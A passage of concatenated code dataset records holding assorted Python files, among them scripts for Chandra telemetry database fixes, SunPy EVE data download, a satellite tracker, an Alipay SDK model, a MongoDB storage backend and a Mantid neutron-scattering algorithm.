help=\"DBI server (|sybase)\")\n \n (opt, args) = parser.parse_args()\n return (opt, args)\n\ndef main():\n import numpy as np\n from scipy.signal import medfilt\n\n opt, args = get_options()\n\n if 'tlm' not in globals():\n print('Reading telemetry')\n tlm = Ska.Table.read_ascii_table('t/tlm2002_2008.dat', delimiters=[','])\n\n db = Ska.DBI.DBI(dbi=opt.dbi, server=opt.server)\n\n datestart = '2002:010:00:00:00' \n datestop = '2009:001:00:00:00'\n\n if 'states' not in globals():\n print('Getting states')\n states = db.fetchall(\"\"\"SELECT * from cmd_states\n WHERE datestart > '%s'\n AND datestop < '%s'\"\"\" % (datestart, datestop))\n ok = (tlm.date > states[0].tstart) & (tlm.date < states[-1].tstop)\n tlm = tlm[ok]\n state_vals = cmd_states.interpolate_states(states, tlm.date)\n\n simdiff = medfilt(tlm.tscpos - state_vals.simpos, 5)\n bad = abs(simdiff) > 5000.\n bad_state_idxs = np.unique(np.searchsorted(states.tstop, tlm[bad].date))\n for bad_state in states[bad_state_idxs]:\n ok = (tlm.date >= bad_state.tstart) & (tlm.date <= bad_state.tstop)\n simpos = np.median(tlm[ok].tscpos)\n cmd = \"UPDATE cmd_states SET simpos=%d WHERE datestart='%s'\" % (simpos, bad_state.datestart)\n print(cmd)\n db.execute(cmd)\n\n pitchdiff = medfilt(tlm.aosares1 - state_vals.pitch, 9)\n bad = abs(pitchdiff) > 5.\n bad_state_idxs = np.unique(np.searchsorted(states.tstop, tlm[bad].date))\n for bad_state in states[bad_state_idxs]:\n ok = (tlm.date >= bad_state.tstart) & (tlm.date <= bad_state.tstop)\n pitch = np.median(tlm[ok].aosares1)\n cmd = \"UPDATE cmd_states SET pitch=%f WHERE datestart='%s'\" % (pitch, bad_state.datestart)\n print(cmd)\n db.execute(cmd)\n\n db.commit()\n\nif __name__ == '__main__':\n main()\n \n","sub_path":"fix_pitch_simz.py","file_name":"fix_pitch_simz.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"275513915","text":"# -*- coding: utf-8 -*-\n#\n#\n# \n\"\"\"\n Provides programs to process and analyze EVE data.\n \n .. warning:: This module is still in development!\n\n\"\"\" \n\nfrom __future__ import absolute_import\nimport urllib\nimport csv\nfrom datetime import datetime, date, time \nfrom sunpy.time import parse_time\n\ndef get_latest_l0cs_goes_data():\n \"\"\"Grab the latest EVE GOES Proxy data and plot it in a standard \n (GOES) plot format\n \n Parameters\n ----------\n None : none\n\n Returns\n -------\n value : tuple\n Return a tuple (filename, headers) where filename is the local file \n name under which the object can be found, and headers is \n whatever the info() method of the object returned by urlopen.\n\n See Also\n --------\n\n Examples\n --------\n >>> import sunpy.instr.sdoeve as eve\n >>> eve.get_latest_l0cs_goes_data()\n \n Reference\n ---------\n | \n\n \"\"\"\n \n #TODO should this be in the net module?\n url = 'http://lasp.colorado.edu/eve/data_access/quicklook/quicklook_data/L0CS/LATEST_EVE_L0CS_DIODES_1m.txt'\n \n f = urllib.urlretrieve(url)\n reader = csv.reader(open(f[0], \"rb\"), delimiter = ' ', skipinitialspace = True)\n \n i = 0\n \n t = []\n xrsb = []\n xrsa = []\n \n for row in reader:\n if row[0][0] != ';':\n #read the date line\n if i == 0:\n d = date(int(row[0]),int(row[2]),int(row[3]))\n else:\n t.append(time(int(row[0][0:2]),int(row[0][2:4])))\n xrsb.append(float(row[1]))\n xrsa.append(float(row[2])) \n i = i + 1\n \n ts = [datetime.combine(d,s) for s in t]\n \n return [ts,xrsa, xrsb]\n\ndef show_latest_l0cs_goes_data():\n \"\"\"Download and plot the latest EVE GOES proxy data in a standard GOES plot.\n\n Parameters\n ----------\n None : none\n\n Returns\n -------\n None : none\n\n See Also\n --------\n\n Examples\n --------\n >>> import sunpy.instr.sdoeve as eve\n >>> eve.show_latest_l0cs_goes_data()\n \n Reference\n ---------\n | \n\n \"\"\"\n from sunpy.instr.goes import show as goes_show\n \n data = get_latest_l0cs_goes_data()\n \n goes_show(data[0], data[1], data[2], \n title = 'EVE GOES Proxy Xray Flux (1 minute data)')\n \ndef get_l0cs_data(time_range):\n \"\"\"Download EVE Level 0CS data for a time range (not done coding!)\n \n .. warning:: Note done coding!\n \"\"\"\n return 0\n \ndef get_l0cs_date(request_date):\n \"\"\"Download EVE Level 0CS data for a specific date.\n\n .. warning:: Note done coding!\n\n Parameters\n ----------\n date : parse_time compatible time string or datetime object\n\n Returns\n -------\n dict : none\n\n See Also\n --------\n\n Examples\n --------\n >>> import sunpy.instr.sdoeve as eve\n >>> data = eve.get_l0cs_date(['2010/04/03'])\n \n Reference\n ---------\n | http://lasp.colorado.edu/eve/data_access/\n \n \"\"\"\n \n url_root = 'http://lasp.colorado.edu/eve/data/quicklook/L0CS/SpWx/'\n _date = parse_time(request_date)\n \n url = url_root + _date.strftime('%Y/%Y%m%d') + '_EVE_L0CS_DIODES_1m.txt'\n url_counts = url_root + _date.strftime('%Y/%Y%m%d') + '_EVE_L0CS_DIODES_1m_counts.txt'\n \n f = urllib.urlretrieve(url)\n reader = csv.reader(open(f[0], \"rb\"), delimiter = ' ', skipinitialspace = True)\n \n field_names = ('hhmm', 'xrs-b', 'xrs-a', 'sem', 'ESPquad', 'esp171', \n 'esp257', 'esp304', 'esp366', 'espdark', 'megsp', 'megsdark', \n 'q0esp', 'q1esp', 'q3esp', 'cmlat', 'cmlon')\n \n t = []\n xrsb = []\n xrsa = []\n i = 0\n for row in reader:\n if row[0][0] != ';':\n #read the date line\n if i == 0:\n d = date(int(row[0]),int(row[2]),int(row[3]))\n else:\n t.append(time(int(row[0][0:2]),int(row[0][2:4])))\n xrsb.append(float(row[1]))\n xrsa.append(float(row[2])) \n i = i + 1\n ","sub_path":"sunpy/instr/sdoeve.py","file_name":"sdoeve.py","file_ext":"py","file_size_in_byte":4063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"638839715","text":"class Solution:\n def shortestToChar0(self, S, C):\n prev = float('-inf')\n ans = []\n for i, x in enumerate(S):\n if x == C: prev = i\n ans.append(i - prev)\n\n prev = float('inf')\n for i in range(len(S) - 1, -1, -1):\n if S[i] == C: prev = i\n ans[i] = min(ans[i], prev - i)\n\n return ans\n\n def shortestToChar(self, S, C):\n n = len(S)\n res = [n] * n\n pos = -n\n for i in list(range(n)) + list(range(n)[::-1]):\n if S[i] == C: pos = i\n res[i] = min(res[i], abs(i - pos))\n return res\n\n\nif __name__ == \"__main__\":\n sol = Solution()\n print(sol.shortestToChar(\"loveleetcode\", 'e'))\n","sub_path":"Solutions/821. Shortest Distance to a Character/821.py","file_name":"821.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"557289951","text":"def weird(n):\n\ts=[]\n\twhile n!=1:\n\t\ts.append(str(n))\n\t\tif n%2==0:\n\n\t\t\tn=n//2\n\t\telse:\n\t\t\tn=(n*3)+1\n\ts.append(str(n))\n\tprint(\" \".join(s))\n\n\ndef missing(num,vals):\n\tf=list(sorted(vals))\n\tfor i in range(1,f[-1]+1):\n\t\tif i not in f:\n\t\t\tprint(i)\n\t\t\tbreak\n\n\n\nn=int(input())\nweird(n)\nmissing(5,[2,3,1,5])\n\n","sub_path":"td.py","file_name":"td.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"572649932","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport json\n\nfrom alipay.aop.api.constant.ParamConstants import *\n\n\nclass TechriskInnovateMpcpromoDataQueryModel(object):\n\n def __init__(self):\n self._goods_id = None\n self._page_no = None\n self._page_size = None\n\n @property\n def goods_id(self):\n return self._goods_id\n\n @goods_id.setter\n def goods_id(self, value):\n self._goods_id = value\n @property\n def page_no(self):\n return self._page_no\n\n @page_no.setter\n def page_no(self, value):\n self._page_no = value\n @property\n def page_size(self):\n return self._page_size\n\n @page_size.setter\n def page_size(self, value):\n self._page_size = value\n\n\n def to_alipay_dict(self):\n params = dict()\n if self.goods_id:\n if hasattr(self.goods_id, 'to_alipay_dict'):\n params['goods_id'] = self.goods_id.to_alipay_dict()\n else:\n params['goods_id'] = self.goods_id\n if self.page_no:\n if hasattr(self.page_no, 'to_alipay_dict'):\n params['page_no'] = self.page_no.to_alipay_dict()\n else:\n params['page_no'] = self.page_no\n if self.page_size:\n if hasattr(self.page_size, 'to_alipay_dict'):\n params['page_size'] = self.page_size.to_alipay_dict()\n else:\n params['page_size'] = self.page_size\n return params\n\n @staticmethod\n def from_alipay_dict(d):\n if not d:\n return None\n o = TechriskInnovateMpcpromoDataQueryModel()\n if 'goods_id' in d:\n o.goods_id = d['goods_id']\n if 'page_no' in d:\n o.page_no = d['page_no']\n if 'page_size' in d:\n o.page_size = d['page_size']\n return o\n\n\n","sub_path":"alipay/aop/api/domain/TechriskInnovateMpcpromoDataQueryModel.py","file_name":"TechriskInnovateMpcpromoDataQueryModel.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"354378026","text":"from os.path import join, basename\nimport csv\nDATA_DIR = 'tempdata'\n\nWRANGLED_HEADERS = ['year', 'name', 'gender' , 'ratio' , 'females', 'males', 'total']\nWRANGLED_DATA_FILENAME = join(DATA_DIR, 'wrangled2014.csv')\n\nYEAR = 2014\nthefilename = join(DATA_DIR, 'yob' + str(YEAR) + '.txt')\n\n\nnamesdict = {}\nwith open(thefilename, 'r') as thefile:\n for line in thefile:\n name, gender, count = line.split(',')\n if not namesdict.get(name):\n namesdict[name] = {'M': 0, 'F': 0}\n namesdict[name][gender] += int(count)\n\nmy_awesome_list = []\n\nfor name, babiescount in namesdict.items():\n xdict = {}\n xdict['year'] = YEAR\n xdict['name'] = name\n xdict['females'] = babiescount['F']\n xdict['males'] = babiescount['M']\n xdict['total'] = xdict['males'] + xdict['females']\n if xdict['females'] >= xdict['males']:\n xdict['gender'] = 'F'\n xdict['ratio'] = round(100 * xdict['females'] / xdict['total'])\n else:\n xdict['gender'] = 'M'\n xdict['ratio'] = round(100 * xdict['males'] / xdict['total'])\n my_awesome_list.append(xdict)\n\n\nwfile = open(WRANGLED_DATA_FILENAME, 'w')\nwcsv = csv.DictWriter(wfile, fieldnames=WRANGLED_HEADERS)\nwcsv.writeheader()\n\ndef xfoo(xdict):\n return (-xdict['total'], xdict['name'])\n\nmy_final_list = sorted(my_awesome_list, key=xfoo)\n\nfor row in my_final_list:\n wcsv.writerow(row)\nwfile.close()\n\n\nfinalfile = open(WRANGLED_DATA_FILENAME, 'r')\nthestupidlines = finalfile.readlines()[0:5]\nfor line in thestupidlines:\n print(line.strip())","sub_path":"exercises/0020-gender-detector/g.py","file_name":"g.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"405687557","text":"\"\"\"\r\nCheck xml schema: https://pypi.python.org/pypi/xmlschema/0.9.8\r\n\"\"\"\r\nfrom django.shortcuts import render\r\nfrom django.template.response import TemplateResponse\r\nfrom django.conf import settings\r\nfrom django import template\r\nfrom demandware.models import ProductMaster, ProductMeta, RelatedProduct, Category, CategoryMeta, Variant, ProductImage, HeaderMgr\r\nfrom demandware.models_handler.category_handler import get_categories\r\nfrom demandware.models_handler.product_handler import *\r\nimport datetime\r\nimport xmlschema\r\nimport logging\r\n\r\n# Get an instance of a logger\r\nlogger = logging.getLogger('django')\r\n\r\ndef handle_export(form=None):\r\n\tdata_type = form.cleaned_data.get('data_type')\r\n\tif int(data_type) == 1:\r\n\t\treturn handle_export_catalogs()\r\n\tif int(data_type) == 2:\r\n\t\treturn handle_export_pricebook()\r\n\tif int(data_type) == 3:\r\n\t\treturn handle_export_inventory()\r\n\tif int(data_type) == 4:\r\n\t\treturn handle_export_category()\r\n\tif int(data_type) == 5:\r\n\t\treturn handle_export_product()\r\n\tif int(data_type) == 6:\r\n\t\treturn handle_export_recommand()\r\n\treturn None\r\n\r\ndef handle_export_catalogs():\r\n\ttry:\r\n\t\tcategories = get_categories()\r\n\t\tproducts = get_product_master()\r\n\t\tvariants = get_product_variants()\r\n\t\tproduct_category = get_product_category()\r\n\t\trelated_products = get_related_product()\r\n\t\treturn dict(\r\n\t\t\tnow=datetime.datetime.utcnow().isoformat() + \"Z\",\r\n\t\t\tcategories=categories,\r\n\t\t\tproductMaster=products,\r\n\t\t\tproductVariants=variants,\r\n\t\t\tproductCategory=product_category,\r\n\t\t\trelatedProducts=related_products,\r\n\t\t)\r\n\texcept Exception as e:\r\n\t\treturn str(e)\r\n\r\ndef handle_export_pricebook():\r\n\ttry:\r\n\t\tlist_cur = get_list_currency()\r\n\t\treturn dict(\r\n\t\t\tnow=datetime.datetime.utcnow().isoformat() + \"Z\",\r\n\t\t\tcurrencies=list_cur,\r\n\t\t)\r\n\texcept Exception as e:\r\n\t\treturn str(e)\r\n\r\ndef handle_export_inventory():\r\n\ttry:\r\n\t\tproducts = get_product_master()\r\n\t\tvariants = get_product_variants()\r\n\t\treturn dict(\r\n\t\t\tnow=datetime.datetime.utcnow().isoformat() + \"Z\",\r\n\t\t\tvariants=variants,\r\n\t\t\tproductMaster=products,\r\n\t\t)\r\n\texcept Exception as e:\r\n\t\treturn str(e)\r\n\r\ndef handle_export_category():\r\n\ttry:\r\n\t\tcategories = get_categories()\r\n\t\treturn dict(\r\n\t\t\tnow=datetime.datetime.utcnow().isoformat() + \"Z\",\r\n\t\t\tcategories=categories,\r\n\t\t)\r\n\texcept Exception as e:\r\n\t\treturn str(e)\r\n\r\ndef handle_export_product():\r\n\ttry:\r\n\t\tproducts = get_product_master()\r\n\t\tvariants = get_product_variants()\r\n\t\tproduct_category = get_product_category()\r\n\t\treturn dict(\r\n\t\t\tnow=datetime.datetime.utcnow().isoformat() + \"Z\",\r\n\t\t\tproductMaster=products,\r\n\t\t\tproductVariants=variants,\r\n\t\t\tproductCategory=product_category,\r\n\t\t)\r\n\texcept Exception as e:\r\n\t\treturn str(e)\r\n\r\ndef handle_export_recommand():\r\n\ttry:\r\n\t\trelated_products = get_related_product()\r\n\t\treturn dict(\r\n\t\t\tnow=datetime.datetime.utcnow().isoformat() + \"Z\",\r\n\t\t\trelatedProducts=related_products,\r\n\t\t)\r\n\texcept Exception as e:\r\n\t\treturn str(e)\r\n","sub_path":"demandware/func/handle_export.py","file_name":"handle_export.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"551947298","text":"import pandas\nimport numpy\nfrom math import *\n\ndef __init__(path, index):\n readData(folder, index)\n\ndef readData(path, index):\n\n data = pandas.read_csv(path, index_col=index)\n\n #\n temp0 = pandas.Series( 2*data['p0_pt']*data['p1_pt'], index=data.index )\n temp1 = pandas.Series( data['p0_eta'] - data['p1_eta'], index=data.index )\n temp1 = numpy.cosh(temp1)\n\n #data['test0'] = pandas.Series( data['p0_pt'], index=data.index)\n #data['test1'] = pandas.Series( data['p1_pt'], index=data.index)\n #data['test2'] = temp0\n #data['test3'] = temp1\n\n #data['mttest4'] = numpy.sqrt(temp0 * temp1) \n\n #print(data)\n\n return data\n \n\nif __name__ == \"__main__\":\n __init__()\n","sub_path":"flavours-of-physics-start/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"459950983","text":"# -*- coding: utf-8 -*-\n# Copyright © 2008-2011 Kozea\n# This file is part of Multicorn, licensed under a 3-clause BSD license.\n\n\nfrom __future__ import print_function\nfrom multicorn.utils import colorize\nfrom multicorn.requests.types import Type, Dict, List\nfrom ... import python_executor\nfrom ..abstract import AbstractCorn\nfrom .wrappers import MongoWrapper\n\ntry:\n import pymongo\nexcept ImportError:\n import sys\n print(colorize(\n 'yellow',\n \"WARNING: The Mongo DB AP is not available.\"), file=sys.stderr)\n\n\nclass Mongo(AbstractCorn):\n \"\"\"\n Corn storing items in a Mongo DB noSql server.\n \"\"\"\n\n def __init__(self, name, identity_properties,\n hostname, port, database, collection):\n super(Mongo, self).__init__(name, identity_properties)\n self.hostname = hostname\n self.port = port\n self.database = database\n self.collection_name = collection\n self.register(\"_id\", int)\n\n def bind(self, multicorn):\n super(Mongo, self).bind(multicorn)\n if not hasattr(self.multicorn, '_mongo_metadatas'):\n self.multicorn._mongo_metadatas = {}\n connect_point = \"%s:%s\" % (self.hostname, self.port)\n connection = self.multicorn._mongo_metadatas.get(connect_point, None)\n if connection is None:\n connection = pymongo.Connection(self.hostname, self.port)\n self.multicorn._mongo_metadatas[connect_point] = connection\n self.connection = connection\n self.db = self.connection[self.database]\n self.collection = self.db[self.collection_name]\n\n def register(self, name, type=object, **kwargs):\n self.properties[name] = Type(\n corn=self, name=name, type=type)\n\n def _all(self):\n \"\"\"Return an iterable of all items in the mongo collection.\"\"\"\n for mongo_item in self.collection.find():\n yield self._mongo_to_item(mongo_item)\n\n def delete(self, item):\n self.collection.remove(\n dict((key, value) for key, value in item.items()))\n\n def save(self, item):\n self.collection.save(dict(\n (key, value) for key, value in item.items()\n if not (key == \"_id\" and value is None)))\n item.saved = True\n\n def is_all_mongo(self, request):\n used_types = request.used_types()\n all_requests = reduce(\n lambda x, y: list(x) + list(y), used_types.values(), set())\n return all(\n isinstance(x, MongoWrapper) for x in all_requests)\n\n def _mongo_to_item(self, mongo_item):\n item = {}\n for name in self.properties.keys():\n item[name] = mongo_item[name]\n return self.create(item)\n\n def _execute(self, mrq, return_type):\n result = mrq.execute(self.collection)\n if isinstance(return_type, List):\n if isinstance(return_type.inner_type, Dict):\n if return_type.inner_type.corn:\n def to_items(results):\n for result in results:\n yield self._mongo_to_item(result)\n return to_items(result)\n else:\n return result\n else:\n def to_list(results):\n for mongo_item in result:\n if \"____\" in mongo_item:\n yield mongo_item[\"____\"]\n else:\n yield mongo_item\n return to_list(result)\n elif isinstance(return_type, Dict):\n if return_type.corn:\n return self._mongo_to_item(result)\n elif return_type.type == int:\n return result\n else:\n if \"____\" in result:\n return result[\"____\"]\n return result\n\n def execute(self, request):\n wrapped_request = MongoWrapper.from_request(request)\n if self.is_all_mongo(wrapped_request):\n return self._execute(\n wrapped_request.to_mongo(),\n wrapped_request.return_type())\n else:\n return python_executor.execute(request)\n","sub_path":"multicorn/corns/mongo/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"193996121","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jun 15 15:36:31 2015\r\n\r\n@author: Matthias Maasch\r\n\r\nsource for reading tle files:\r\nhttp://blog.thetelegraphic.com/2012/gps-sattelite-tracking-in-python-using-pyephem/\r\n\"\"\"\r\nimport ephem\r\nfrom sys import stdout\r\nfrom datetime import datetime\r\nimport time\r\nimport os\r\nimport numpy as np\r\nimport urllib\r\nimport serial\r\nimport curses\r\n\r\ndegrees_per_radian = 180.0 / np.pi\r\nflag_tracking = 0 # tracking on/off\r\nflag_doppler = 2 # doppler correction off/up/dwn/all\r\ntracked_sat = 0 # number of sat to be tracked\r\n\r\n###################################################################\r\n# load TLE file\r\n###################################################################\r\ndef loadTLE(filename):\r\n \"\"\" Loads a TLE file and creates a list of satellites.\"\"\"\r\n f = open(filename)\r\n satlist = []\r\n l1 = f.readline()\r\n while l1:\r\n l2 = f.readline()\r\n l3 = f.readline()\r\n sat = ephem.readtle(l1,l2,l3)\r\n satlist.append(sat)\r\n #print sat.name\r\n l1 = f.readline()\r\n\r\n f.close()\r\n #print \"%i satellites loaded into list\"%len(satlist)\r\n return satlist\r\n\r\n\r\n\r\n\r\n###################################################################\r\n# Settings\r\n###################################################################\r\nTLE_name = 'amateur.txt'\r\n\r\nhome = ephem.Observer()\r\nhome.lon = '8.625' # +E\r\nhome.lat = '49.8542' # +N\r\nhome.elevation = 60 # meters\r\nf_dwn = 145e6 # satellite frequency in Hz\r\nupdate_intervall = 1 # update intervall in sec\r\n###################################################################\r\n\r\n\r\n###################################################################\r\n# Main function\r\n###################################################################\r\n# open serial port\r\n#comport = serial.Serial('/dev/tty.usbserial-A800ekX6',9600)\r\n\r\n# download latest TLE file from server\r\nprint('\\nDownloading TLE files from server: http://www.celestrak.com/NORAD/elements/%s' % TLE_name)\r\nurllib.urlretrieve('http://www.celestrak.com/NORAD/elements/%s' % TLE_name, TLE_name)\r\n#time.sleep(2)\r\n\r\n# load TLE file and save satellite data in variable \r\nsats = loadTLE(TLE_name)\r\n\r\n# initialize the screen etc.\r\nscr = curses.initscr()\r\nscr = curses.newwin(200, 100, 0, 0)\r\ncurses.halfdelay(int(update_intervall*10))\r\ncurses.noecho()\r\ncurses.curs_set(0)\r\n\r\nscr.addstr(1,0,' SATELLITE TRACKING observer: N%2.4f E%3.4f ' % (home.lat * degrees_per_radian, home.long * degrees_per_radian))\r\nscr.addstr(4,0,' ----------------------------------------------------------------------------')\r\nscr.addstr(5,0,' NORAD Satellite EL AZ veloc f_rx ')\r\nscr.addstr(6,0,' ----------------------------------------------------------------------------')\r\nscr.addstr(7+len(sats),0,' ----------------------------------------------------------------------------')\r\nscr.addstr(8+len(sats),0,' (S)elect Satellite (T)racking on/off (Q)uit')\r\nscr.addstr(9+len(sats),0,' (U)plink Frequency (D)ownlink Frequency (C)orrect Doppler: up/dwn')\r\n\r\nwhile True:\r\n home.date = datetime.utcnow()\r\n scr.addstr(2,0,' %sUTC downlink: %8.3fMHz ' % (home.date, f_dwn/1e6))\r\n scr.addstr(3,0,' %s' % TLE_name)\r\n scr.addstr(3,36,' uplink: %8.3fMHz' % (f_dwn/1e6))\r\n# visualize settings\r\n # tracking\r\n if (flag_tracking == 1) and tracked_sat:\r\n scr.addstr(8+len(sats),32,'on', curses.A_UNDERLINE)\r\n scr.addstr(8+len(sats),35,'off')\r\n else:\r\n scr.addstr(8+len(sats),32,'on')\r\n scr.addstr(8+len(sats),35,'off', curses.A_UNDERLINE)\r\n # doppler\r\n if flag_doppler == 3:\r\n scr.addstr(9+len(sats),62,'up/dwn', curses.A_UNDERLINE)\r\n elif flag_doppler == 2:\r\n scr.addstr(9+len(sats),62,'up')\r\n scr.addstr(9+len(sats),65,'dwn', curses.A_UNDERLINE)\r\n elif flag_doppler == 1:\r\n scr.addstr(9+len(sats),62,'up', curses.A_UNDERLINE)\r\n scr.addstr(9+len(sats),65,'dwn')\r\n else:\r\n scr.addstr(9+len(sats),62,'up/dwn')\r\n scr.refresh()\r\n# show all satellite data\r\n for n in range(0,len(sats)):\r\n sats[n].compute(home)\r\n f_rx = f_dwn/(1+sats[n].range_velocity/3.0e8)\r\n scr.addstr(7+n,1,' %2d %5d %25s %5.1f %5.1f %6.0f %8.3f ' % (n+1, sats[n].catalog_number, sats[n].name, sats[n].alt * degrees_per_radian, sats[n].az * degrees_per_radian, sats[n].range_velocity, f_rx/1e6))\r\n if sats[n].alt>=0:\r\n scr.addstr(7+n,14,' %25s %5.1f %5.1f ' % (sats[n].name, sats[n].alt * degrees_per_radian, sats[n].az * degrees_per_radian), curses.A_STANDOUT)\r\n if n == tracked_sat-1:\r\n scr.addstr(7+n,1,' %2d %5d %25s %5.1f %5.1f %6.0f %8.3f ' % (n+1, sats[n].catalog_number, sats[n].name, sats[n].alt * degrees_per_radian, sats[n].az * degrees_per_radian, sats[n].range_velocity, f_rx/1e6), curses.A_STANDOUT)\r\n# check input key command \r\n char = scr.getch()\r\n # quit\r\n if char == ord('q'):\r\n curses.echo()\r\n scr.keypad(0)\r\n curses.nocbreak()\r\n curses.endwin()\r\n exit()\r\n # select satellite\r\n elif char == ord('s'):\r\n curses.curs_set(1)\r\n curses.echo()\r\n scr.addstr(11+len(sats),1,'enter satellite number:')\r\n tracked_sat = int(scr.getstr(11+len(sats),25))\r\n if (tracked_sat < len(sats)+1) and (tracked_sat > 0):\r\n tracked_sat == tracked_sat\r\n else:\r\n tracked_sat = 0\r\n flag_tracking = 0\r\n flag_tracking = 0 # prevent positioner from suddenly moving when satellite is changed\r\n curses.curs_set(0)\r\n curses.noecho()\r\n scr.addstr(11+len(sats),1,' ')\r\n curses.halfdelay(int(update_intervall*10))\r\n #scr.refresh() \r\n # toggle tracking\r\n elif char == ord('t'):\r\n flag_tracking = 1 - flag_tracking\r\n # toggle doppler correction\r\n elif char == ord('c'):\r\n if flag_doppler == 0:\r\n flag_doppler = 1\r\n elif flag_doppler == 1:\r\n flag_doppler = 2\r\n elif flag_doppler == 2:\r\n flag_doppler = 3\r\n elif flag_doppler == 3:\r\n flag_doppler = 0\r\n elif char != curses.ERR: # This is true if the user pressed something\r\n scr.addstr(11+len(sats), 0, \" pressed %s \" % char, curses.A_STANDOUT)\r\n else:\r\n scr.addstr(11+len(sats), 0, \" %d \" % tracked_sat)\r\n","sub_path":"track.py","file_name":"track.py","file_ext":"py","file_size_in_byte":6525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"30598180","text":"import json, urllib\r\n\r\nclass contriesIteration():\r\n\r\n def __init__(self, write_file, json_file):\r\n self.index = -1\r\n self.write_file = open(write_file, \"w\", encoding=\"UTF-8\")\r\n with open(json_file, \"r\", encoding=\"UTF-8\") as f:\r\n self.file = json.loads(f.read())\r\n\r\n\r\n def __iter__(self):\r\n return self\r\n\r\n def __next__(self):\r\n self.index += 1\r\n url = \"https://ru.wikipedia.org/wiki/\" + self.file[self.index][\"name\"][\"official\"].replace(\" \", \"_\")\r\n print(url)\r\n self.write_file.write(url + \" - \" + self.file[self.index][\"name\"][\"official\"] + \"\\n\")\r\n try:\r\n self.file[self.index + 1]\r\n except:\r\n self.write_file.close()\r\n raise StopIteration\r\n return url\r\n\r\n\r\nmy_class = contriesIteration()\r\nj = 0\r\nfor i in my_class:\r\n j +=1\r\n print(j)","sub_path":"домашка 1.2/номер1.py","file_name":"номер1.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"531085631","text":"from glob import glob\nimport os\n\ndef Print(dir):\n\tinclude_root = '../Include/'\n\twith open(include_root + dir+'.hpp', 'w') as f:\n\t\tprint(\"#pragma once\", file=f)\n\t\tprint('', file=f)\n\t\tfor x in glob(include_root + dir+\"/**/*.hpp\", recursive=True):\n\t\t\tx = os.path.relpath(x, include_root)\n\t\t\tx = x.replace('\\\\', '/')\n\t\t\tprint(f\"#include \\\"{x}\\\"\", file=f)\n\nPrint(\"FishEngine\")\nPrint(\"FishEditor\")","sub_path":"Scripts/get_all_headers.py","file_name":"get_all_headers.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"340673136","text":"#pylint: disable=no-init,too-many-instance-attributes\nfrom __future__ import (absolute_import, division, print_function)\nfrom mantid.simpleapi import *\nfrom mantid.api import (PythonAlgorithm, AlgorithmFactory, MatrixWorkspaceProperty,\n ITableWorkspaceProperty, PropertyMode, Progress)\nfrom mantid.kernel import Direction, logger\nfrom mantid import config\nimport math\nimport os\n\n\nclass TransformToIqt(PythonAlgorithm):\n\n _sample = None\n _resolution = None\n _e_min = None\n _e_max = None\n _e_width = None\n _number_points_per_bin = None\n _parameter_table = None\n _output_workspace = None\n _dry_run = None\n\n\n def category(self):\n return \"Workflow\\\\Inelastic;Workflow\\\\MIDAS\"\n\n\n def summary(self):\n return 'Transforms an inelastic reduction to I(Q, t)'\n\n\n def PyInit(self):\n self.declareProperty(MatrixWorkspaceProperty('SampleWorkspace', '',\n optional=PropertyMode.Mandatory,\n direction=Direction.Input),\n doc=\"Name for the sample workspace.\")\n\n self.declareProperty(MatrixWorkspaceProperty('ResolutionWorkspace', '',\n optional=PropertyMode.Mandatory,\n direction=Direction.Input),\n doc=\"Name for the resolution workspace.\")\n\n self.declareProperty(name='EnergyMin', defaultValue=-0.5,\n doc='Minimum energy for fit. Default=-0.5')\n self.declareProperty(name='EnergyMax', defaultValue=0.5,\n doc='Maximum energy for fit. Default=0.5')\n self.declareProperty(name='BinReductionFactor', defaultValue=10.0,\n doc='Decrease total number of spectrum points by this ratio through merging of '\n 'intensities from neighbouring bins. Default=1')\n\n self.declareProperty(ITableWorkspaceProperty('ParameterWorkspace', '',\n direction=Direction.Output,\n optional=PropertyMode.Optional),\n doc='Table workspace for saving TransformToIqt properties')\n\n self.declareProperty(MatrixWorkspaceProperty('OutputWorkspace', '',\n direction=Direction.Output,\n optional=PropertyMode.Optional),\n doc='Output workspace')\n\n self.declareProperty(name='DryRun', defaultValue=False,\n doc='Only calculate and output the parameters')\n\n\n def PyExec(self):\n self._setup()\n\n self._calculate_parameters()\n\n if not self._dry_run:\n self._transform()\n\n self._add_logs()\n\n else:\n skip_prog = Progress(self, start=0.3, end=1.0, nreports=2)\n skip_prog.report('skipping transform')\n skip_prog.report('skipping add logs')\n logger.information('Dry run, will not run TransformToIqt')\n\n self.setProperty('ParameterWorkspace', self._parameter_table)\n self.setProperty('OutputWorkspace', self._output_workspace)\n\n\n def _setup(self):\n \"\"\"\n Gets algorithm properties.\n \"\"\"\n\n from IndirectCommon import getWSprefix\n\n self._sample = self.getPropertyValue('SampleWorkspace')\n self._resolution = self.getPropertyValue('ResolutionWorkspace')\n\n self._e_min = self.getProperty('EnergyMin').value\n self._e_max = self.getProperty('EnergyMax').value\n self._number_points_per_bin = 